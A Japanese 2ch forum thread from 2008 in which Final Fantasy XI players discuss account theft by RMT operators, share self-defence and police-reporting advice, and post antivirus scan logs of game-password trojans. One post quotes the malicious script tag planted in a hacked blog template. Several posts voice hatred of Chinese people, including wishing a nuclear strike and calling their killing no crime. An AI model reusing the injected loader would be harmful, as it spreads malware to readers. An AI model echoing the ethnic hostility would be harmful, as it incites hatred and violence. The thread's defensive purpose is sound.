●● RMT業者の垢ハックが多発している件14 ●●

このエントリーをはてなブックマークに追加
1既にその名前は使われています
RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1205225002/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★

まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
  TEL:0570-003-399(PHSからは03-5333-1860)
  月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
  他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。
2既にその名前は使われています:2008/03/24(月) 02:50:50.08 ID:7DTVIQ6X
■アカウントハックとは
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。

奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。

※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります
3既にその名前は使われています:2008/03/24(月) 02:51:08.68 ID:7DTVIQ6X
■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】

▼内容が不明なサイトにアクセスしない
 ※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
 絶対にリンクを押す前にアドレスを見る事

▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない

▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
 ※詳しくはマイクロソフト社の公式サイトを参照のこと。

▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する

▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない

▼ウイルス駆除ソフトを常に最新のバージョンで使用する
4既にその名前は使われています:2008/03/24(月) 02:51:55.37 ID:7DTVIQ6X
■具体的な自衛策
1:ウイルススキャンソフトを導入する。
  ・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
  ・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。

2:WindowsUpdateでWindowsを最新の状態にする
   Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
   後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
   一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
   オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。

3:ファイアウォールを有効にする
  ・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う

  ・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
   (2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
    スレッドがあります。「ファイアウォール」などの単語で検索してください)
5既にその名前は使われています:2008/03/24(月) 02:52:01.80 ID:EkJgurYg
業者あげ
6既にその名前は使われています:2008/03/24(月) 02:52:10.54 ID:7DTVIQ6X
■具体的な自衛策その2

4:IPフィルタを導入する
  PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます

  ★PeerGuardian2の導入・設定方法はここから
    リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
    このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
    セキュリティー対策→IPフィルタ で確認してください。

5:IE以外のウェブブラウザを使用する
  Firefox、Opera、など。
  ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
  ブラウザ自体のアップデートも行う必要があります。

6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
  ttp://www.aguse.jp/ 
  URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
  ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。
7既にその名前は使われています:2008/03/24(月) 02:52:30.81 ID:7DTVIQ6X
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。

現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。

不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。

この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。
8既にその名前は使われています:2008/03/24(月) 02:52:49.34 ID:7DTVIQ6X
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧
  ttp://www.npa.go.jp/cyber/soudan.htm

2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)

3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。

4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
9既にその名前は使われています:2008/03/24(月) 02:53:03.17 ID:7DTVIQ6X
■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋

もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも


警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ
10既にその名前は使われています:2008/03/24(月) 02:53:56.36 ID:7DTVIQ6X
■このスレの目的
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする

★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください

☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。
11既にその名前は使われています:2008/03/24(月) 02:54:22.50 ID:7DTVIQ6X
■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。

Name=名前(必須)  Email Address=メール(必須)  Real name=本名(任意)  Server name=サーバー(必須)

Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です

[Preview Your Signature]=貴方の署名を確認します

View Signatures Without Signing=署名をしないで他の署名を見ます
12既にその名前は使われています:2008/03/24(月) 03:04:30.88 ID:vQXYTLxz
>>1



ウエブマニー組で今現在パス抜き被害あってないから安心したってやってたら、課金後
に被害食らうかもしれんね。
13既にその名前は使われています:2008/03/24(月) 03:05:44.32 ID:EkJgurYg
紙媒体しか安心して見れないこんなFFじゃ
14既にその名前は使われています:2008/03/24(月) 03:16:22.91 ID:mYAh1jWO
RMTする人達が減ったのかな?o(`ω´*)o
15既にその名前は使われています:2008/03/24(月) 03:19:43.83 ID:euFX6pRg
中国はマジで腐った国だな。
16既にその名前は使われています:2008/03/24(月) 03:21:27.29 ID:BS8RD3fS
いちょつ
17既にその名前は使われています:2008/03/24(月) 03:22:44.14 ID:BS8RD3fS
前すれ>>995
あいあい
こっちに移動したよ
18既にその名前は使われています:2008/03/24(月) 03:24:47.93 ID:IxSaroBR
カスペのオンラインスキャンが動くブラウザを使わないほうがいいぞ
あれが動かないブラウザのほうがセキュリティ的には信用できる
オペラなんて罠ページ踏んでも(だいたい)平気だぜ・・・普通のページも見れないことあるが・・・
19既にその名前は使われています:2008/03/24(月) 03:34:30.07 ID:xPk7dngc
>>15
自分が痛くなければ何やっても愛国無罪な国だからな
20既にその名前は使われています:2008/03/24(月) 03:43:51.91 ID:l9SAEJ0+
>>13
poizun
21既にその名前は使われています:2008/03/24(月) 03:50:16.95 ID:Df86aKNo
ヴァナモンブログちょっとひどくね?
改ざんされたことを責めるつもりは毛頭ないが、そのことに触れずにしれっと直して
あたかもなにもありませんでした、みたいなのはチキンすぎる。
自分のブログに訪れてくれた読者に対して申し訳ないとか思わないのかね?
こういうのを認めると今後そういうやつが増えて被害拡大するとおもうんだ。
22既にその名前は使われています:2008/03/24(月) 03:54:32.57 ID:vQXYTLxz
ネットは自己責任。
叩き所が間違ってる。
23既にその名前は使われています:2008/03/24(月) 03:56:10.23 ID:ExAbIYmH
まぁ注意喚起位すればいいとは思うけど、fc2のせいであってヴァナモンのせいじゃないしな。
どちらかといえばfc2がページの上に告知するとか
問題を抜本的に解決できるような方法を提示しないこと、またそれを実行しないことが問題。
24既にその名前は使われています:2008/03/24(月) 03:59:36.99 ID:8jcNID1A
前スレ57, 63( http://live27.2ch.net/test/read.cgi/ogame/1205225002/57,63 )の
xia.exeを実行してカスペルスキー試用版でのスキャン終了

(1/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\05S94ZKH\1ro[1].exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8DUF8TQ3\laoie[1].exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8X2ZG5A3\geizi[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\CNA1O3S3\3ff11[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\S1ANG1QF\2t1[1].exe
検知: トロイの木馬 Trojan-Downloader.Win32.Delf.dsz
 →ファイル: C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\Help\3EC849F38E63.dll
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\Help\3EC849F38E63.exe
25既にその名前は使われています:2008/03/24(月) 04:00:24.85 ID:8jcNID1A
(2/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
 →ファイル: C:\WINDOWS\system32\1.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\system32\2.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
 →ファイル: C:\WINDOWS\system32\3.exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
 →ファイル: C:\WINDOWS\system32\4.exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
 →ファイル: C:\WINDOWS\system32\5.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.pnr
 →ファイル: C:\WINDOWS\system32\krnp32drv.dll
検知: アドウェア not-a-virus:AdWare.Win32.BHO.aj
 →ファイル: c:\windows\system32\xunleibho_001.dll

こんな感じ
26既にその名前は使われています:2008/03/24(月) 04:03:02.46 ID:Q/ktx4QO
>>21
ヴァナモンブログ主を責めるのはちょっとひどくね?
改ざんされたテンプレートをそのまま放置しているfc2を責めることをせずに、
個人を叩いてひゃっほい、みたいなのはチキンすぎる。
運営しているサイトに訪れてくれた読者に対してfc2は申し訳ないとか思わないのかね?
こういうのを認めると今後こういう運営をするやつ増えて被害拡大するとおもうんだ。

であろう?
27前スレ969:2008/03/24(月) 04:06:50.23 ID:Vn0/fEwr
カスペルのスキャンが1時間早く終わったーヽ(´ー`)ノ
結果はバスターさんの前に使ってたノートン先生の置き土産が、マルウェアに勘違いされたくらいですた。

以前から使っていたPG2とFirefox&IFRAMEの禁止、今回のカスペルくらいが
自分みたいな素人ができる自衛手段ですかのう。

あ、今使ってるHUBの機械が8年前から使ってるcoregaっていうメーカーのなんだけど、これってマズイ?(´・ω・`)
28既にその名前は使われています:2008/03/24(月) 04:13:56.30 ID:Df86aKNo
もちろんまずはfc2が何か言うべきとは思うけどさ。
今後まだまだ改ざんブログが増えるであろうことを考慮すると
その事実を個人レベルで隠蔽するような行為はどうかと思ったんだ。
このスレ的にはブログで事実報告の必要は無いって意見が多いってことか、了解。
29既にその名前は使われています:2008/03/24(月) 04:16:01.17 ID:Q/ktx4QO
Trojan.Win32.Inject.agc
 まず、こいつがきっかけで次のダウンローダを起動する。
Trojan-Downloader.Win32.Delf.dsz
 次の4種のワームをダウンロードし、常駐させる。
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.lbb
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.pnr
 各MMOに対応したID/pw保存ファイルサーチャ
Backdoor.Win32.Hupigon.dsx
 上記4種のワームが検出したID/pw保存ファイルを
 どこぞに送信するためのポートを開けるとともに
 遠隔操作用のポート開けて常駐して待機する。

そして、見事にBOT-NET入りを果たすと。
30既にその名前は使われています:2008/03/24(月) 04:26:34.88 ID:B+yN8em4
いつも見てるFF系ブログの大半がFC2だったわ・・・・
カスペでスキャンしてなんともなかったから良かったが、怖くて暫くはブログ見れないな。
31既にその名前は使われています:2008/03/24(月) 04:26:41.08 ID:Q/ktx4QO
>>28
いいか?
改ざんしたのはブログ主ではなく、悪意のテンプレートにしたやつがいて
悪意のあるテンプレートを供給していた運営者がいるんだよ。

つまり、
 改ざんしたテンプレートを運営者に出したやつが主犯
 そのテンプレートをまともにチェックせずに公開したやつが共犯
なのさ。
本当に叩く先がどこか分かるよな?

確かに注意勧告をブログ主もするとベターだろうが、
ブログ主もクラックされた被害者な訳だ。
32既にその名前は使われています:2008/03/24(月) 04:28:56.31 ID:uo1cC9cX
手動でパス打つほうが危ないなんてことは・・・ないよね?
33既にその名前は使われています:2008/03/24(月) 04:31:35.92 ID:Q/ktx4QO
>>30
BLOGを読むときの手として、直接行くのではなく、RSSリーダで読むのもあり。
なぜかというと、直接行くと、テンプレートを含む全体を読み込むが
RSSリーダならば、本文しか普通は読み込まない「はず」
34既にその名前は使われています:2008/03/24(月) 04:32:51.75 ID:juaPfmeM
でもさ、ヴァナモンblogで感染して
それを知らずに感染したまま今もヴァナモンblogを見ている人もいると思うんだよね。

叩く矛先の優先順位の問題ではないと思うんだ。
35既にその名前は使われています:2008/03/24(月) 04:34:12.73 ID:Q/ktx4QO
>>32
>>29のTrojan-PSW.Win32.OnLineGamesの4つが
キーロガーに変わったらどうなるだろうね?

どっちが安全なんてないね。
つか、キーロガーの方が広範囲に情報取れるな。
36既にその名前は使われています:2008/03/24(月) 04:35:57.93 ID:Df86aKNo
>>31
わかった、っつってるのに粘着なヤツだなw

>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
今のところこれに関しては事実関係が確定してないと思ってたんだが確定したのか?
37既にその名前は使われています:2008/03/24(月) 04:36:36.60 ID:vQXYTLxz
そこまで粘着するなら本人に言えとしか、是非をうんぬんするスレじゃないよ。
38既にその名前は使われています:2008/03/24(月) 04:37:03.15 ID:/fj6dMAF
ちょっと聞きたいんですけど
ヴァナモンblogではなく
ヴァナモンでのモンスター検索の方は大丈夫なんでしょうか?
個人的にblogは見ずに検索だけをメインにしてたので・・・
39既にその名前は使われています:2008/03/24(月) 04:37:42.86 ID:l9SAEJ0+
個人にそういう役目を担わせる義務はないだろうから
人目につくネ実で、スレ保持/情報共有、注意呼びかけるなど。
有志アカハク専用サイトあんだし。
40ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:37:53.33 ID:0CiVccUT
>>21
テンプレ改竄問題は知ってたけど、
ウチがテンプレ改竄されたの今知って飛んで来たところなんだが
毎日毎日業者のコメントがウザかったので丁度数日前にhttp://をNGワードにしたんだよな
その報復なんだろうか
でテンプレチェックしてるんだけど、どう直せばいいのか教えて欲しいんだが
テンプレには%77とか入ってないぞ?
41既にその名前は使われています:2008/03/24(月) 04:38:13.47 ID:8jcNID1A
ノートンが検出できない4種類のファイルを検体としてシマンテックに送付した
42既にその名前は使われています:2008/03/24(月) 04:38:46.92 ID:TfhGREOv
>>27
8年前程度なら、すでにバカHUB入手しづらくなってたと思うから、
スイッチングHUBじゃね?

43既にその名前は使われています:2008/03/24(月) 04:39:47.13 ID:Xxx+f+/4
粘着っつうか、過剰擁護に反論してるだけだろ
44既にその名前は使われています:2008/03/24(月) 04:40:06.77 ID:Q/ktx4QO
>>34
fc2がテンプレートの配布と利用を止めたらどうなるかね?
読めないのを不思議に思って、読者は何かするんじゃないか?
まぁ、何もしない読者だから感染するんだけどさ。

「ブログ主が注意勧告するのはベターだ」が、
自責としてメインで動くべきは運営側であろう?
45既にその名前は使われています:2008/03/24(月) 04:43:33.34 ID:8jcNID1A
>>40
ヴァナモンの人こんばんは
私が夕方に見たときにはすでに無くなってたのでなんとも
46既にその名前は使われています:2008/03/24(月) 04:43:37.03 ID:Df86aKNo
>>40
本人キター、って・・・あれ?直してないの?
ソースチェッカーで改ざんされてたのをオレは確認してて、
ソースが消えたのも確認したんだが・・・・なんで消えたんだろう?
47ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:44:07.46 ID:0CiVccUT
というかもう直ってるの?>>21でしれっと直してって書いてあるんだけど
俺は何も弄ってないんだけどな

3週間くらい前だったかな?ブログにFC2のブログがハックされて〜
ヴァナモンさんも注意してくださいってブログにコメントくれた人が居たんだよね
でその時もチェックしたけどそれっぽいのは無かったし
48既にその名前は使われています:2008/03/24(月) 04:44:15.26 ID:juaPfmeM
>>44
だからその「サイトで勧告するのがベターだよね」という話でしょ。
FC2よりもまずヴァナモンを叩くという話ではないはずなのに
なぜかそういう方向へ持っていって擁護されるんだよね。
49ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:45:27.27 ID:0CiVccUT
とりあえず前スレを確認してきます
50既にその名前は使われています:2008/03/24(月) 04:49:01.17 ID:vQXYTLxz
しれっと直してやのその事実を個人レベルで隠蔽するような行為やの書いてる
奴は叩きと認識されるでそ。

FF取り上げる全てのサイトやネ実でななしやロカルーででかでかと注意喚起すべき
だろうけどね。
51既にその名前は使われています:2008/03/24(月) 04:49:45.63 ID:rpE40Jdl
iframeもなかったのかな。勝手に消えたって、業者が埋め込んでまた消すってあるのかな???
52既にその名前は使われています:2008/03/24(月) 04:50:12.06 ID:uo1cC9cX
ここまで、話題になったんだから、国レベルで、どうにかしてほしいもんだ
53既にその名前は使われています:2008/03/24(月) 04:53:02.27 ID:5r7sQEdf
中国人は最近ではチベットの件とかいろいろ物議醸し出してるからなぁ
それでなくても「中国、韓国お断り」は俺の知ってる世界では常識だし

国レベルで中国に核を落としてくれたらいいのにね
54既にその名前は使われています:2008/03/24(月) 04:53:53.96 ID:QCo+vR7/
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ

ここは私も気になる所です
ブログのテンプレはDL以降、ブロガー個人での管理になるから
有名ブログのテンプレ改竄はブログ管理のID・passの漏洩によって
発生する場合が大半だと思っていたけど実際はどうなんでしょうか?

悪意のあるテンプレートが公開されているケースもないとは言えませんが
55既にその名前は使われています:2008/03/24(月) 04:54:41.34 ID:dI49kwAF
>>46
仕込まれてたのはscript?
iframeなら広告が原因だろうか。
56既にその名前は使われています:2008/03/24(月) 04:55:15.07 ID:Q/ktx4QO
中国自体が核保有国だから、なんかしでかしてくれるのを期待したいw
57既にその名前は使われています:2008/03/24(月) 04:56:23.92 ID:A+UNPr50
>>47
エントリーのブロックが終わって
<<--!コメント-->>の直下に
<script language="javascript"
 src="hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
こんなんがあった
本来はhttpだったが誤アクセス防止にxxにしといた。

本人が直したんじゃないってことはグーグルに気づかれたために業者が直したかのかな
ヴァナモンをグーグルで検索すると危険サイトに指定されている。
58前スレ969:2008/03/24(月) 04:57:03.38 ID:Vn0/fEwr
>>42
おお、ありがとう。
家族がネットでの自己防衛に無頓着&家族にすらPC触らせたがらないんで心配だったんよ(´・ω・`)
大丈夫そうなんで、当分の間HUBはいまの機械使っておくよ。
さすがにやばいんで寝る。
夜までこのスレが生き残っていることを祈りつつあげ!
59既にその名前は使われています:2008/03/24(月) 04:58:18.68 ID:A+UNPr50
>>55
広告が原因って意味不明なんだが
ちなみに黒魔の軌跡のところは最初iframeだったのがいつのまにかscriptにかわってた
業者が何度も改竄してるとみるべきじゃねーか?
60ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 05:02:56.71 ID:0CiVccUT
3/19の夜にhttp://をNGワードにしたんだよな
それからパッタリ業者のコメント無くなってたんだが
それの報復ぽよなぁ。
となると3/19以降に仕掛けられた可能性が高いと思う。
つーか他のFC2のサイトと違うテンプレ使ってるし
防ごうとして防げるのこれ?
61既にその名前は使われています:2008/03/24(月) 05:03:26.19 ID:l9SAEJ0+
ヴァナモンのグーグルの表示が危険URL指定なのか
確かめたら本当だった
http://tune.ache-bang.com/~vg/outitem/up/img/19041.jpg
62既にその名前は使われています:2008/03/24(月) 05:04:26.58 ID:A+UNPr50
>>60
テンプレ何つかってるとかそういう問題じゃない
あとNGとか関係ねーとおもうよ
割とアクセス多いところを狙ってるみたいだし

最初は検索トップにでるサイトだけだったが
今はなりふり構わず無差別になりつつある
63既にその名前は使われています:2008/03/24(月) 05:05:16.22 ID:mrzccnLo
>>32
ID Managerとかは使えないの?キーロガーには引っかからない&クリップボード経由でもなくなる。
PCじゃFFしないから知らないけどw
64既にその名前は使われています:2008/03/24(月) 05:05:57.77 ID:rpE40Jdl
報復ってより、今はどこもコメント承認制だったりで
てっとり早く感染させられる改竄の方主流にしだしたとかかもですね
65既にその名前は使われています:2008/03/24(月) 05:06:05.62 ID:Q/ktx4QO
>>57
それ、まだ生きてるな。
ActiveX起動して、www■fccja■com/d2.aspに飛ばしとる。
で、%うんたらってとこからすると、UTFじゃない?
66既にその名前は使われています:2008/03/24(月) 05:06:33.24 ID:Df86aKNo
>>60
自分で直したんじゃないのなら業者が再利用するために消したって可能性あるね。
まずはfc2のパスワード変えてみたらどうだろう?
67既にその名前は使われています:2008/03/24(月) 05:09:43.58 ID:Q/ktx4QO
>>61
うひ、誰ぞサイトアドバイザに報告したのがいるんだわw
68ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 05:20:56.66 ID:0CiVccUT
えーとそれで、ウチ見て感染した場合はカスペルキーとかいうのでチェックがいいのかな?
普通のウイルススキャンじゃ引っかからない?
googleのキャッシュはブログが有害指定されてるから無いっぽいので
いつのキャッシュから判断してるのか分からないけど
土曜の深夜に誰か気づいたってことは、仕込まれたのやっぱ先週中頃以降じゃないのかなぁ
ヴァナモンで検索して>>61になったら誰かすぐ気づくだろうし
69既にその名前は使われています:2008/03/24(月) 05:21:04.67 ID:Q/ktx4QO
時期と手口からすると、これ近いんじゃないかと思ったり。
 ttp://www.itmedia.co.jp/news/articles/0803/14/news018.html
70既にその名前は使われています:2008/03/24(月) 05:24:10.66 ID:Q/ktx4QO
>>68
今まで検出してくれた報告があるのは、カスペルスキーだけですな。
オンライン版
 ttp://www.kaspersky.co.jp/virusscanner
体験版
 ttp://www.kaspersky.co.jp/trials
を紹介しておくとよいかも?
71既にその名前は使われています:2008/03/24(月) 05:25:08.58 ID:zadZE9R9
管理できないなら削除しろ

大きな被害でてるぞ
72既にその名前は使われています:2008/03/24(月) 05:26:24.57 ID:XNnaYNDD
ほんとに業者やりたい放題だな
FC2運営内部にRMT関係者か金を貰って工作している奴がいるとしか思えん
対策出来ない以上はblogを見ないという選択肢しか無いじゃん
73既にその名前は使われています:2008/03/24(月) 05:28:54.65 ID:l9SAEJ0+
今の所ブログのみで、
HPコンテンツ等のメインサーチの方は
改ざんなさそうだね。
74既にその名前は使われています:2008/03/24(月) 05:30:14.79 ID:nn2RN4KX
>>69
そこのサイトの過去の記事ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
に、同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。
という件があるな。
75既にその名前は使われています:2008/03/24(月) 05:31:10.21 ID:dI49kwAF
落ち着くまで、パスワードかけて非公開にしとくとか。
パス認証画面が安全かどうかは分からんのだが。
76既にその名前は使われています:2008/03/24(月) 05:43:24.08 ID:f8U+hHlG
>>68
いまいち原因把握出来て無さそうだし、一時的にでもブログ停止した方がよくないか?
今まで随分お世話になって偉そうな事を言うのもあれだが、いつまたやられるかわからんぞ

77既にその名前は使われています:2008/03/24(月) 05:51:44.38 ID:sV5MTkg6
ヴァナモンブログが利用していたテンプレートに最近何か仕込まれて、今日までにかなり感染した。
現在では、そのテンプレートは何も仕込まれてないものに修正されている。

こういうことか?

テンプレの提供元であるfc2に問題があると?
78既にその名前は使われています:2008/03/24(月) 06:01:37.22 ID:9jGDstCn
"%77%77%77%2E%〜" ってのは普通の人間はぱっと見が書かれてるか判らん罠。
URLを16進コードで書いたもので"www.〜"ってコトなんだけど
ブラウザが自動変換してたら%77で検索しても意味無いかも。

>>57に書かれてる謎の文字列を変換するとhellh■netへのurlになる。
79既にその名前は使われています:2008/03/24(月) 06:31:03.34 ID:8CSFG+dl
こんな時間に新スレ移行したのか、いちおつ。
もしかしたらまとめの人がログ取り切れてないかもしれないから、
誰か一応前スレのログを保存しといてくれ。俺は携帯なんでできないんだ
80既にその名前は使われています:2008/03/24(月) 06:41:19.69 ID:QCo+vR7/
FC2から公開されている段階のテンプレには(おそらく)問題なく、
テンプレをDLした後に、ブログの管理画面で利用者(ブロガー)個人がテンプレの
ソースを改変することが出来るから、そこで改竄されたんだと思っています。

FC2ブログの管理画面に行く際に必要なIDとpassの内
IDはそのブログURLの一部に使われているから一目瞭然で、passだけ判明してしまえば
ブログ管理画面にいけてしまうんですよね

passだけなら総当りで試行すれば簡単に一致してしまいそうな気が…

私もFC2でブログを書いているんですが、これを気に閉鎖しようと思っています
81既にその名前は使われています:2008/03/24(月) 06:57:03.29 ID:hdKDzAOI
試しにカスペルスキーのオンラインスキャンしたら
こんな物が引っかかったのだけれど…
ググってもよくわからん

not-a-virus:PSWTool.Win32.Messen.n

これってやられちゃってる?(ノω`)
82既にその名前は使われています:2008/03/24(月) 07:01:42.72 ID:JYmJyemP
カスペ関連で一気にFF潰せそうな勢いだなの
83既にその名前は使われています:2008/03/24(月) 07:04:39.69 ID:n0XTFGnb
中国人を 一日3人まで殺しても 罪にはなりません^^
84既にその名前は使われています:2008/03/24(月) 07:18:44.68 ID:A+UNPr50
>>80
IDつかわれてねーよ
お前がぬるいだけじゃねーの
85既にその名前は使われています:2008/03/24(月) 07:22:21.89 ID:rCHR+RwE
おはようございます。起きたら終わってました。

報告です。

ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\H8OJH9OT\t1[1].exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\SBT7I6Z1\ff11[1].exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\Program Files\Common Files\Microsoft Shared\MSInfo\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067565.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067628.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067790.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
